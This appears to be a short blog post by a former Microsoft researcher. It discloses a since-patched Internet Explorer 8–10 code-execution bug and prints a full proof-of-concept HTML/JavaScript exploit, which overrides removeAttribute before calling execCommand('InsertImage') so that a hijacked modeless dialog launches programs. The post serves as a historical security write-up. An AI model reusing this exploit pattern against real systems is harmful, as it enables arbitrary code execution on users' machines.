EoP/RCE: Arbitrary Code Execution via InsertImage Internal Dialog

This was a variation of an earlier internal dialog elevation bug that still worked after the initial patch. By overriding removeAttribute on an element before calling document.execCommand("InsertImage"), the internal dialog could be hijacked to open a modeless dialog under attacker control — and that dialog could then launch arbitrary programs.

<img id="c2eec6217e1a474eb649bfedd577334a">
<img id="c2eec6217e1a474eb649bfedd577334a">
<script language="JavaScript">
document.all.c2eec6217e1a474eb649bfedd577334a.removeAttribute = function tricked_removeAttribute(a,b,c)
{
    if (!window.fRunOnce)
    {
        win = showModelessDialog("shell.html", window, "dialogwidth=400px");
        window.fRunOnce = true;
    }
}
function main()
{
    if (window.fRunOnce)
    {
        alert("Refresh the page and retry");
        return;
    }
    document.execCommand("InsertImage",1,1);
}
</script>
<input type="button" onclick="main();" value="Run Notepad">

The trick was hooking removeAttribute on the image element before the exec command fired. When the internal InsertImage dialog tried to clean up that element, the override intercepted the call and opened a modeless dialog. Unlike the earlier version which relied on caller.constructor, this one avoided that mechanism entirely, making it work across IE8, IE9, and IE10.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS: VBScript Error Bubbles Up to Expose Cross-Origin Constructor] :: [DoS: Loading an HTC Behavior on a createHTMLDocument Element Crashes IE] >